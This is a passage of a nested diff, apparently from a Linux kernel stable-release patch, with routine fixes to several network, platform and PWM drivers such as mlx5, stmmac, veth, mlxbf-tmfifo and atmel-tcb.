+ 	     (req->op == NIX_AQ_INSTOP_WRITE &&
+-	      req->sq_mask.ena && req->sq_mask.smq && req->sq.ena))) {
++	      req->sq_mask.ena && req->sq.ena && smq_mask))) {
+ 		if (!is_valid_txschq(rvu, blkaddr, NIX_TXSCH_LVL_SMQ,
+-				     pcifunc, req->sq.smq))
++				     pcifunc, smq))
+ 			return NIX_AF_ERR_AQ_ENQUEUE;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 7e318133423a9..0ac5ae16308f6 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -2698,6 +2698,9 @@ static int mtk_hwlro_get_fdir_all(struct net_device *dev,
+ 	int i;
+ 
+ 	for (i = 0; i < MTK_MAX_LRO_IP_CNT; i++) {
++		if (cnt == cmd->rule_cnt)
++			return -EMSGSIZE;
++
+ 		if (mac->hwlro_ip[i]) {
+ 			rule_locs[cnt] = i;
+ 			cnt++;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index 72b61f66df37a..cd15d36b1507e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -97,7 +97,6 @@ int mlx5e_tc_set_attr_rx_tun(struct mlx5e_tc_flow *flow,
+ #if IS_ENABLED(CONFIG_INET) && IS_ENABLED(CONFIG_IPV6)
+ 	else if (ip_version == 6) {
+ 		int ipv6_size = MLX5_FLD_SZ_BYTES(ipv6_layout, ipv6);
+-		struct in6_addr zerov6 = {};
+ 
+ 		daddr = MLX5_ADDR_OF(fte_match_param, spec->match_value,
+ 				     outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6);
+@@ -105,8 +104,8 @@ int mlx5e_tc_set_attr_rx_tun(struct mlx5e_tc_flow *flow,
+ 				     outer_headers.src_ipv4_src_ipv6.ipv6_layout.ipv6);
+ 		memcpy(&tun_attr->dst_ip.v6, daddr, ipv6_size);
+ 		memcpy(&tun_attr->src_ip.v6, saddr, ipv6_size);
+-		if (!memcmp(&tun_attr->dst_ip.v6, &zerov6, sizeof(zerov6)) ||
+-		    !memcmp(&tun_attr->src_ip.v6, &zerov6, sizeof(zerov6)))
++		if (ipv6_addr_any(&tun_attr->dst_ip.v6) ||
++		    ipv6_addr_any(&tun_attr->src_ip.v6))
+ 			return 0;
+ 	}
+ #endif
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+index 5e0f7d96aac51..d136360ac6a98 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+@@ -123,18 +123,32 @@ out:
+ 	return ret;
+ }
+ 
+-static void irq_release(struct mlx5_irq *irq)
++/* mlx5_system_free_irq - Free an IRQ
++ * @irq: IRQ to free
++ *
++ * Free the IRQ and other resources such as rmap from the system.
++ * BUT doesn't free or remove reference from mlx5.
++ * This function is very important for the shutdown flow, where we need to
++ * cleanup system resoruces but keep mlx5 objects alive,
++ * see mlx5_irq_table_free_irqs().
++ */
++static void mlx5_system_free_irq(struct mlx5_irq *irq)
+ {
+-	struct mlx5_irq_pool *pool = irq->pool;
+-
+-	xa_erase(&pool->irqs, irq->index);
+ 	/* free_irq requires that affinity_hint and rmap will be cleared
+ 	 * before calling it. This is why there is asymmetry with set_rmap
+ 	 * which should be called after alloc_irq but before request_irq.
+ 	 */
+ 	irq_update_affinity_hint(irq->irqn, NULL);
+-	free_cpumask_var(irq->mask);
+ 	free_irq(irq->irqn, &irq->nh);
++}
++
++static void irq_release(struct mlx5_irq *irq)
++{
++	struct mlx5_irq_pool *pool = irq->pool;
++
++	xa_erase(&pool->irqs, irq->index);
++	mlx5_system_free_irq(irq);
++	free_cpumask_var(irq->mask);
+ 	kfree(irq);
+ }
+ 
+@@ -597,7 +611,7 @@ static void mlx5_irq_pool_free_irqs(struct mlx5_irq_pool *pool)
+ 	unsigned long index;
+ 
+ 	xa_for_each(&pool->irqs, index, irq)
+-		free_irq(irq->irqn, &irq->nh);
++		mlx5_system_free_irq(irq);
+ }
+ 
+ static void mlx5_irq_pools_free_irqs(struct mlx5_irq_table *table)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index a07bcb2f5d2e2..1559a4dafd413 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -2692,9 +2692,7 @@ static int stmmac_tx_clean(struct stmmac_priv *priv, int budget, u32 queue)
+ 
+ 	/* We still have pending packets, let's call for a new scheduling */
+ 	if (tx_q->dirty_tx != tx_q->cur_tx)
+-		hrtimer_start(&tx_q->txtimer,
+-			      STMMAC_COAL_TIMER(priv->tx_coal_timer[queue]),
+-			      HRTIMER_MODE_REL);
++		stmmac_tx_timer_arm(priv, queue);
+ 
+ 	__netif_tx_unlock_bh(netdev_get_tx_queue(priv->dev, queue));
+ 
+@@ -2975,9 +2973,13 @@ static int stmmac_init_dma_engine(struct stmmac_priv *priv)
+ static void stmmac_tx_timer_arm(struct stmmac_priv *priv, u32 queue)
+ {
+ 	struct stmmac_tx_queue *tx_q = &priv->dma_conf.tx_queue[queue];
++	u32 tx_coal_timer = priv->tx_coal_timer[queue];
++
++	if (!tx_coal_timer)
++		return;
+ 
+ 	hrtimer_start(&tx_q->txtimer,
+-		      STMMAC_COAL_TIMER(priv->tx_coal_timer[queue]),
++		      STMMAC_COAL_TIMER(tx_coal_timer),
+ 		      HRTIMER_MODE_REL);
+ }
+ 
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 059d610901d84..fc1458f96e170 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -2628,6 +2628,9 @@ static int r8152_poll(struct napi_struct *napi, int budget)
+ 	struct r8152 *tp = container_of(napi, struct r8152, napi);
+ 	int work_done;
+ 
++	if (!budget)
++		return 0;
++
+ 	work_done = rx_bottom(tp, budget);
+ 
+ 	if (work_done < budget) {
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index 727b9278b9fe5..36c5a41f84e44 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -313,6 +313,7 @@ static netdev_tx_t veth_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct veth_priv *rcv_priv, *priv = netdev_priv(dev);
+ 	struct veth_rq *rq = NULL;
++	int ret = NETDEV_TX_OK;
+ 	struct net_device *rcv;
+ 	int length = skb->len;
+ 	bool use_napi = false;
+@@ -345,6 +346,7 @@ static netdev_tx_t veth_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	} else {
+ drop:
+ 		atomic64_inc(&priv->dropped);
++		ret = NET_XMIT_DROP;
+ 	}
+ 
+ 	if (use_napi)
+@@ -352,7 +354,7 @@ drop:
+ 
+ 	rcu_read_unlock();
+ 
+-	return NETDEV_TX_OK;
++	return ret;
+ }
+ 
+ static u64 veth_stats_tx(struct net_device *dev, u64 *packets, u64 *bytes)
+diff --git a/drivers/parisc/led.c b/drivers/parisc/led.c
+index 8bdc5e043831c..3737c1021f88b 100644
+--- a/drivers/parisc/led.c
++++ b/drivers/parisc/led.c
+@@ -56,8 +56,8 @@
+ static int led_type __read_mostly = -1;
+ static unsigned char lastleds;	/* LED state from most recent update */
+ static unsigned int led_heartbeat __read_mostly = 1;
+-static unsigned int led_diskio    __read_mostly = 1;
+-static unsigned int led_lanrxtx   __read_mostly = 1;
++static unsigned int led_diskio    __read_mostly;
++static unsigned int led_lanrxtx   __read_mostly;
+ static char lcd_text[32]          __read_mostly;
+ static char lcd_text_default[32]  __read_mostly;
+ static int  lcd_no_led_support    __read_mostly = 0; /* KittyHawk doesn't support LED on its LCD */
+diff --git a/drivers/pinctrl/intel/pinctrl-cherryview.c b/drivers/pinctrl/intel/pinctrl-cherryview.c
+index 0d6b5fab2f7e4..de07b0837a04f 100644
+--- a/drivers/pinctrl/intel/pinctrl-cherryview.c
++++ b/drivers/pinctrl/intel/pinctrl-cherryview.c
+@@ -1698,7 +1698,6 @@ static int chv_pinctrl_probe(struct platform_device *pdev)
+ 	struct intel_community_context *cctx;
+ 	struct intel_community *community;
+ 	struct device *dev = &pdev->dev;
+-	struct acpi_device *adev = ACPI_COMPANION(dev);
+ 	struct intel_pinctrl *pctrl;
+ 	acpi_status status;
+ 	unsigned int i;
+@@ -1766,7 +1765,7 @@ static int chv_pinctrl_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	status = acpi_install_address_space_handler(adev->handle,
++	status = acpi_install_address_space_handler(ACPI_HANDLE(dev),
+ 					community->acpi_space_id,
+ 					chv_pinctrl_mmio_access_handler,
+ 					NULL, pctrl);
+@@ -1783,7 +1782,7 @@ static int chv_pinctrl_remove(struct platform_device *pdev)
+ 	struct intel_pinctrl *pctrl = platform_get_drvdata(pdev);
+ 	const struct intel_community *community = &pctrl->communities[0];
+ 
+-	acpi_remove_address_space_handler(ACPI_COMPANION(&pdev->dev),
++	acpi_remove_address_space_handler(ACPI_HANDLE(&pdev->dev),
+ 					  community->acpi_space_id,
+ 					  chv_pinctrl_mmio_access_handler);
+ 
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 382793e73a60a..30b50920b278c 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -80,8 +80,8 @@ config MLXBF_PMC
+ 
+ config NVSW_SN2201
+ 	tristate "Nvidia SN2201 platform driver support"
+-	depends on HWMON
+-	depends on I2C
++	depends on HWMON && I2C
++	depends on ACPI || COMPILE_TEST
+ 	select REGMAP_I2C
+ 	help
+ 	  This driver provides support for the Nvidia SN2201 platform.
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index be967d797c28e..2d4bbe99959ef 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -191,6 +191,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_smgen_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_1[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0xa0, "TPIO_DATA_BEAT" },
+ 	{ 0xa1, "TDMA_DATA_BEAT" },
+ 	{ 0xa2, "MAP_DATA_BEAT" },
+@@ -214,6 +215,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_1[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_2[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0xa0, "TPIO_DATA_BEAT" },
+ 	{ 0xa1, "TDMA_DATA_BEAT" },
+ 	{ 0xa2, "MAP_DATA_BEAT" },
+@@ -246,6 +248,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_2[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_ecc_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0x100, "ECC_SINGLE_ERROR_CNT" },
+ 	{ 0x104, "ECC_DOUBLE_ERROR_CNT" },
+ 	{ 0x114, "SERR_INJ" },
+@@ -258,6 +261,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_ecc_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_mss_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0xc0, "RXREQ_MSS" },
+ 	{ 0xc1, "RXDAT_MSS" },
+ 	{ 0xc2, "TXRSP_MSS" },
+@@ -265,6 +269,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_mss_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_hnf_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0x45, "HNF_REQUESTS" },
+ 	{ 0x46, "HNF_REJECTS" },
+ 	{ 0x47, "ALL_BUSY" },
+@@ -323,6 +328,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_hnf_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_hnfnet_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0x12, "CDN_REQ" },
+ 	{ 0x13, "DDN_REQ" },
+ 	{ 0x14, "NDN_REQ" },
+@@ -892,7 +898,7 @@ static int mlxbf_pmc_read_event(int blk_num, uint32_t cnt_num, bool is_l3,
+ 				uint64_t *result)
+ {
+ 	uint32_t perfcfg_offset, perfval_offset;
+-	uint64_t perfmon_cfg, perfevt, perfctl;
++	uint64_t perfmon_cfg, perfevt;
+ 
+ 	if (cnt_num >= pmc->block[blk_num].counters)
+ 		return -EINVAL;
+@@ -904,25 +910,6 @@ static int mlxbf_pmc_read_event(int blk_num, uint32_t cnt_num, bool is_l3,
+ 	perfval_offset = perfcfg_offset +
+ 			 pmc->block[blk_num].counters * MLXBF_PMC_REG_SIZE;
+ 
+-	/* Set counter in "read" mode */
+-	perfmon_cfg = FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_ADDR,
+-				 MLXBF_PMC_PERFCTL);
+-	perfmon_cfg |= FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_STROBE, 1);
+-	perfmon_cfg |= FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_WR_R_B, 0);
+-
+-	if (mlxbf_pmc_write(pmc->block[blk_num].mmio_base + perfcfg_offset,
+-			    MLXBF_PMC_WRITE_REG_64, perfmon_cfg))
+-		return -EFAULT;
+-
+-	/* Check if the counter is enabled */
+-
+-	if (mlxbf_pmc_read(pmc->block[blk_num].mmio_base + perfval_offset,
+-			   MLXBF_PMC_READ_REG_64, &perfctl))
+-		return -EFAULT;
+-
+-	if (!FIELD_GET(MLXBF_PMC_PERFCTL_EN0, perfctl))
+-		return -EINVAL;
+-
+ 	/* Set counter in "read" mode */
+ 	perfmon_cfg = FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_ADDR,
+ 				 MLXBF_PMC_PERFEVT);
+@@ -1008,7 +995,7 @@ static ssize_t mlxbf_pmc_counter_show(struct device *dev,
+ 	} else
+ 		return -EINVAL;
+ 
+-	return sprintf(buf, "0x%llx\n", value);
++	return sysfs_emit(buf, "0x%llx\n", value);
+ }
+ 
+ /* Store function for "counter" sysfs files */
+@@ -1078,13 +1065,13 @@ static ssize_t mlxbf_pmc_event_show(struct device *dev,
+ 
+ 	err = mlxbf_pmc_read_event(blk_num, cnt_num, is_l3, &evt_num);
+ 	if (err)
+-		return sprintf(buf, "No event being monitored\n");
++		return sysfs_emit(buf, "No event being monitored\n");
+ 
+ 	evt_name = mlxbf_pmc_get_event_name(pmc->block_name[blk_num], evt_num);
+ 	if (!evt_name)
+ 		return -EINVAL;
+ 
+-	return sprintf(buf, "0x%llx: %s\n", evt_num, evt_name);
++	return sysfs_emit(buf, "0x%llx: %s\n", evt_num, evt_name);
+ }
+ 
+ /* Store function for "event" sysfs files */
+@@ -1139,9 +1126,9 @@ static ssize_t mlxbf_pmc_event_list_show(struct device *dev,
+ 		return -EINVAL;
+ 
+ 	for (i = 0, buf[0] = '\0'; i < size; ++i) {
+-		len += sprintf(e_info, "0x%x: %s\n", events[i].evt_num,
+-			       events[i].evt_name);
+-		if (len > PAGE_SIZE)
++		len += snprintf(e_info, sizeof(e_info), "0x%x: %s\n",
++				events[i].evt_num, events[i].evt_name);
++		if (len >= PAGE_SIZE)
+ 			break;
+ 		strcat(buf, e_info);
+ 		ret = len;
+@@ -1168,7 +1155,7 @@ static ssize_t mlxbf_pmc_enable_show(struct device *dev,
+ 
+ 	value = FIELD_GET(MLXBF_PMC_L3C_PERF_CNT_CFG_EN, perfcnt_cfg);
+ 
+-	return sprintf(buf, "%d\n", value);
++	return sysfs_emit(buf, "%d\n", value);
+ }
+ 
+ /* Store function for "enable" sysfs files - only for l3cache */
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index d31fe7eed38df..a04ff89a7ec44 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -56,6 +56,7 @@ struct mlxbf_tmfifo;
+  * @vq: pointer to the virtio virtqueue
+  * @desc: current descriptor of the pending packet
+  * @desc_head: head descriptor of the pending packet
++ * @drop_desc: dummy desc for packet dropping
+  * @cur_len: processed length of the current descriptor
+  * @rem_len: remaining length of the pending packet
+  * @pkt_len: total length of the pending packet
+@@ -72,6 +73,7 @@ struct mlxbf_tmfifo_vring {
+ 	struct virtqueue *vq;
+ 	struct vring_desc *desc;
+ 	struct vring_desc *desc_head;
++	struct vring_desc drop_desc;
+ 	int cur_len;
+ 	int rem_len;
+ 	u32 pkt_len;
+@@ -83,6 +85,14 @@ struct mlxbf_tmfifo_vring {
+ 	struct mlxbf_tmfifo *fifo;
+ };
+ 
++/* Check whether vring is in drop mode. */
++#define IS_VRING_DROP(_r) ({ \
++	typeof(_r) (r) = (_r); \
++	(r->desc_head == &r->drop_desc ? true : false); })
++
++/* A stub length to drop maximum length packet. */
++#define VRING_DROP_DESC_MAX_LEN		GENMASK(15, 0)
++
+ /* Interrupt types. */
+ enum {
+ 	MLXBF_TM_RX_LWM_IRQ,
+@@ -195,7 +205,7 @@ static u8 mlxbf_tmfifo_net_default_mac[ETH_ALEN] = {
+ static efi_char16_t mlxbf_tmfifo_efi_name[] = L"RshimMacAddr";
+ 
+ /* Maximum L2 header length. */
+-#define MLXBF_TMFIFO_NET_L2_OVERHEAD	36
++#define MLXBF_TMFIFO_NET_L2_OVERHEAD	(ETH_HLEN + VLAN_HLEN)
+ 
+ /* Supported virtio-net features. */
+ #define MLXBF_TMFIFO_NET_FEATURES \
+@@ -243,6 +253,7 @@ static int mlxbf_tmfifo_alloc_vrings(struct mlxbf_tmfifo *fifo,
+ 		vring->align = SMP_CACHE_BYTES;
+ 		vring->index = i;
+ 		vring->vdev_id = tm_vdev->vdev.id.device;
++		vring->drop_desc.len = VRING_DROP_DESC_MAX_LEN;
+ 		dev = &tm_vdev->vdev.dev;
+ 
+ 		size = vring_size(vring->num, vring->align);
+@@ -348,7 +359,7 @@ static u32 mlxbf_tmfifo_get_pkt_len(struct mlxbf_tmfifo_vring *vring,
+ 	return len;
+ }
+ 
+-static void mlxbf_tmfifo_release_pending_pkt(struct mlxbf_tmfifo_vring *vring)
++static void mlxbf_tmfifo_release_pkt(struct mlxbf_tmfifo_vring *vring)
+ {
+ 	struct vring_desc *desc_head;
+ 	u32 len = 0;
+@@ -577,19 +588,25 @@ static void mlxbf_tmfifo_rxtx_word(struct mlxbf_tmfifo_vring *vring,
+ 
+ 	if (vring->cur_len + sizeof(u64) <= len) {
+ 		/* The whole word. */
+-		if (is_rx)
+-			memcpy(addr + vring->cur_len, &data, sizeof(u64));
+-		else
+-			memcpy(&data, addr + vring->cur_len, sizeof(u64));
++		if (!IS_VRING_DROP(vring)) {
++			if (is_rx)
++				memcpy(addr + vring->cur_len, &data,
++				       sizeof(u64));
++			else
++				memcpy(&data, addr + vring->cur_len,
++				       sizeof(u64));
++		}
+ 		vring->cur_len += sizeof(u64);
+ 	} else {
+ 		/* Leftover bytes. */
+-		if (is_rx)
+-			memcpy(addr + vring->cur_len, &data,
+-			       len - vring->cur_len);
+-		else
+-			memcpy(&data, addr + vring->cur_len,
+-			       len - vring->cur_len);
++		if (!IS_VRING_DROP(vring)) {
++			if (is_rx)
++				memcpy(addr + vring->cur_len, &data,
++				       len - vring->cur_len);
++			else
++				memcpy(&data, addr + vring->cur_len,
++				       len - vring->cur_len);
++		}
+ 		vring->cur_len = len;
+ 	}
+ 
+@@ -606,13 +623,14 @@ static void mlxbf_tmfifo_rxtx_word(struct mlxbf_tmfifo_vring *vring,
+  * flag is set.
+  */
+ static void mlxbf_tmfifo_rxtx_header(struct mlxbf_tmfifo_vring *vring,
+-				     struct vring_desc *desc,
++				     struct vring_desc **desc,
+ 				     bool is_rx, bool *vring_change)
+ {
+ 	struct mlxbf_tmfifo *fifo = vring->fifo;
+ 	struct virtio_net_config *config;
+ 	struct mlxbf_tmfifo_msg_hdr hdr;
+ 	int vdev_id, hdr_len;
++	bool drop_rx = false;
+ 
+ 	/* Read/Write packet header. */
+ 	if (is_rx) {
+@@ -632,8 +650,8 @@ static void mlxbf_tmfifo_rxtx_header(struct mlxbf_tmfifo_vring *vring,
+ 			if (ntohs(hdr.len) >
+ 			    __virtio16_to_cpu(virtio_legacy_is_little_endian(),
+ 					      config->mtu) +
+-			    MLXBF_TMFIFO_NET_L2_OVERHEAD)
+-				return;
++					      MLXBF_TMFIFO_NET_L2_OVERHEAD)
++				drop_rx = true;
+ 		} else {
+ 			vdev_id = VIRTIO_ID_CONSOLE;
+ 			hdr_len = 0;
+@@ -648,16 +666,25 @@ static void mlxbf_tmfifo_rxtx_header(struct mlxbf_tmfifo_vring *vring,
+ 
+ 			if (!tm_dev2)
+ 				return;
+-			vring->desc = desc;
++			vring->desc = *desc;
+ 			vring = &tm_dev2->vrings[MLXBF_TMFIFO_VRING_RX];
+ 			*vring_change = true;
+ 		}
++
++		if (drop_rx && !IS_VRING_DROP(vring)) {
++			if (vring->desc_head)
++				mlxbf_tmfifo_release_pkt(vring);
++			*desc = &vring->drop_desc;
++			vring->desc_head = *desc;
++			vring->desc = *desc;
++		}
++
+ 		vring->pkt_len = ntohs(hdr.len) + hdr_len;
+ 	} else {
+ 		/* Network virtio has an extra header. */
+ 		hdr_len = (vring->vdev_id == VIRTIO_ID_NET) ?
+ 			   sizeof(struct virtio_net_hdr) : 0;
+-		vring->pkt_len = mlxbf_tmfifo_get_pkt_len(vring, desc);
++		vring->pkt_len = mlxbf_tmfifo_get_pkt_len(vring, *desc);
+ 		hdr.type = (vring->vdev_id == VIRTIO_ID_NET) ?
+ 			    VIRTIO_ID_NET : VIRTIO_ID_CONSOLE;
+ 		hdr.len = htons(vring->pkt_len - hdr_len);
+@@ -690,15 +717,23 @@ static bool mlxbf_tmfifo_rxtx_one_desc(struct mlxbf_tmfifo_vring *vring,
+ 	/* Get the descriptor of the next packet. */
+ 	if (!vring->desc) {
+ 		desc = mlxbf_tmfifo_get_next_pkt(vring, is_rx);
+-		if (!desc)
+-			return false;
++		if (!desc) {
++			/* Drop next Rx packet to avoid stuck. */
++			if (is_rx) {
++				desc = &vring->drop_desc;
++				vring->desc_head = desc;
++				vring->desc = desc;
++			} else {
++				return false;
++			}
++		}
+ 	} else {
+ 		desc = vring->desc;
+ 	}
+ 
+ 	/* Beginning of a packet. Start to Rx/Tx packet header. */
+ 	if (vring->pkt_len == 0) {
+-		mlxbf_tmfifo_rxtx_header(vring, desc, is_rx, &vring_change);
++		mlxbf_tmfifo_rxtx_header(vring, &desc, is_rx, &vring_change);
+ 		(*avail)--;
+ 
+ 		/* Return if new packet is for another ring. */
+@@ -724,17 +759,24 @@ static bool mlxbf_tmfifo_rxtx_one_desc(struct mlxbf_tmfifo_vring *vring,
+ 		vring->rem_len -= len;
+ 
+ 		/* Get the next desc on the chain. */
+-		if (vring->rem_len > 0 &&
++		if (!IS_VRING_DROP(vring) && vring->rem_len > 0 &&
+ 		    (virtio16_to_cpu(vdev, desc->flags) & VRING_DESC_F_NEXT)) {
+ 			idx = virtio16_to_cpu(vdev, desc->next);
+ 			desc = &vr->desc[idx];
+ 			goto mlxbf_tmfifo_desc_done;
+ 		}
+ 
+-		/* Done and release the pending packet. */
+-		mlxbf_tmfifo_release_pending_pkt(vring);
++		/* Done and release the packet. */
+ 		desc = NULL;
+ 		fifo->vring[is_rx] = NULL;
++		if (!IS_VRING_DROP(vring)) {
++			mlxbf_tmfifo_release_pkt(vring);
++		} else {
++			vring->pkt_len = 0;
++			vring->desc_head = NULL;
++			vring->desc = NULL;
++			return false;
++		}
+ 
+ 		/*
+ 		 * Make sure the load/store are in order before
+@@ -914,7 +956,7 @@ static void mlxbf_tmfifo_virtio_del_vqs(struct virtio_device *vdev)
+ 
+ 		/* Release the pending packet. */
+ 		if (vring->desc)
+-			mlxbf_tmfifo_release_pending_pkt(vring);
++			mlxbf_tmfifo_release_pkt(vring);
+ 		vq = vring->vq;
+ 		if (vq) {
+ 			vring->vq = NULL;
+diff --git a/drivers/pwm/pwm-atmel-tcb.c b/drivers/pwm/pwm-atmel-tcb.c
+index 2837b4ce8053c..2826fc216d291 100644
+--- a/drivers/pwm/pwm-atmel-tcb.c
++++ b/drivers/pwm/pwm-atmel-tcb.c
+@@ -422,13 +422,14 @@ static int atmel_tcb_pwm_probe(struct platform_device *pdev)
+ 	struct atmel_tcb_pwm_chip *tcbpwm;
+ 	const struct atmel_tcb_config *config;
+ 	struct device_node *np = pdev->dev.of_node;
+-	struct regmap *regmap;
+-	struct clk *clk, *gclk = NULL;
+-	struct clk *slow_clk;
+ 	char clk_name[] = "t0_clk";
+ 	int err;
+ 	int channel;
+ 
++	tcbpwm = devm_kzalloc(&pdev->dev, sizeof(*tcbpwm), GFP_KERNEL);
++	if (tcbpwm == NULL)
++		return -ENOMEM;
++
+ 	err = of_property_read_u32(np, "reg", &channel);
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev,
+@@ -437,49 +438,43 @@ static int atmel_tcb_pwm_probe(struct platform_device *pdev)
+ 		return err;
+ 	}
+ 
+-	regmap = syscon_node_to_regmap(np->parent);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	tcbpwm->regmap = syscon_node_to_regmap(np->parent);
++	if (IS_ERR(tcbpwm->regmap))
++		return PTR_ERR(tcbpwm->regmap);
+ 
+-	slow_clk = of_clk_get_by_name(np->parent, "slow_clk");
+-	if (IS_ERR(slow_clk))
+-		return PTR_ERR(slow_clk);
++	tcbpwm->slow_clk = of_clk_get_by_name(np->parent, "slow_clk");
++	if (IS_ERR(tcbpwm->slow_clk))
++		return PTR_ERR(tcbpwm->slow_clk);
+ 
+ 	clk_name[1] += channel;
+-	clk = of_clk_get_by_name(np->parent, clk_name);
+-	if (IS_ERR(clk))
+-		clk = of_clk_get_by_name(np->parent, "t0_clk");
+-	if (IS_ERR(clk))
+-		return PTR_ERR(clk);
++	tcbpwm->clk = of_clk_get_by_name(np->parent, clk_name);
++	if (IS_ERR(tcbpwm->clk))
++		tcbpwm->clk = of_clk_get_by_name(np->parent, "t0_clk");
++	if (IS_ERR(tcbpwm->clk)) {
++		err = PTR_ERR(tcbpwm->clk);
++		goto err_slow_clk;
++	}
+ 
+ 	match = of_match_node(atmel_tcb_of_match, np->parent);
+ 	config = match->data;
+ 
+ 	if (config->has_gclk) {
+-		gclk = of_clk_get_by_name(np->parent, "gclk");
+-		if (IS_ERR(gclk))
+-			return PTR_ERR(gclk);
+-	}
+-
+-	tcbpwm = devm_kzalloc(&pdev->dev, sizeof(*tcbpwm), GFP_KERNEL);
+-	if (tcbpwm == NULL) {
+-		err = -ENOMEM;
+-		goto err_slow_clk;
++		tcbpwm->gclk = of_clk_get_by_name(np->parent, "gclk");
++		if (IS_ERR(tcbpwm->gclk)) {
++			err = PTR_ERR(tcbpwm->gclk);
++			goto err_clk;
++		}
+ 	}
+ 
+ 	tcbpwm->chip.dev = &pdev->dev;
+ 	tcbpwm->chip.ops = &atmel_tcb_pwm_ops;
+ 	tcbpwm->chip.npwm = NPWM;
+ 	tcbpwm->channel = channel;
+-	tcbpwm->regmap = regmap;
+-	tcbpwm->clk = clk;
+-	tcbpwm->gclk = gclk;
+-	tcbpwm->slow_clk = slow_clk;
+ 	tcbpwm->width = config->counter_width;
+ 
+-	err = clk_prepare_enable(slow_clk);
++	err = clk_prepare_enable(tcbpwm->slow_clk);
+ 	if (err)
+-		goto err_slow_clk;
++		goto err_gclk;
+ 
+ 	spin_lock_init(&tcbpwm->lock);
+ 
+@@ -494,23 +489,28 @@ static int atmel_tcb_pwm_probe(struct platform_device *pdev)
+ err_disable_clk:
+ 	clk_disable_unprepare(tcbpwm->slow_clk);
+ 
++err_gclk:
++	clk_put(tcbpwm->gclk);
++
++err_clk:
++	clk_put(tcbpwm->clk);
++
+ err_slow_clk:
+-	clk_put(slow_clk);
++	clk_put(tcbpwm->slow_clk);
+ 
+ 	return err;
+ }
+ 
+-static int atmel_tcb_pwm_remove(struct platform_device *pdev)
++static void atmel_tcb_pwm_remove(struct platform_device *pdev)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwm = platform_get_drvdata(pdev);
+ 
+ 	pwmchip_remove(&tcbpwm->chip);
+ 
+ 	clk_disable_unprepare(tcbpwm->slow_clk);
+-	clk_put(tcbpwm->slow_clk);
++	clk_put(tcbpwm->gclk);
+ 	clk_put(tcbpwm->clk);
+-
+-	return 0;
++	clk_put(tcbpwm->slow_clk);
+ }
+ 
+ static const struct of_device_id atmel_tcb_pwm_dt_ids[] = {
+@@ -564,7 +564,7 @@ static struct platform_driver atmel_tcb_pwm_driver = {
+ 		.pm = &atmel_tcb_pwm_pm_ops,
+ 	},
+ 	.probe = atmel_tcb_pwm_probe,
+-	.remove = atmel_tcb_pwm_remove,
++	.remove_new = atmel_tcb_pwm_remove,
+ };
+ module_platform_driver(atmel_tcb_pwm_driver);
+ 
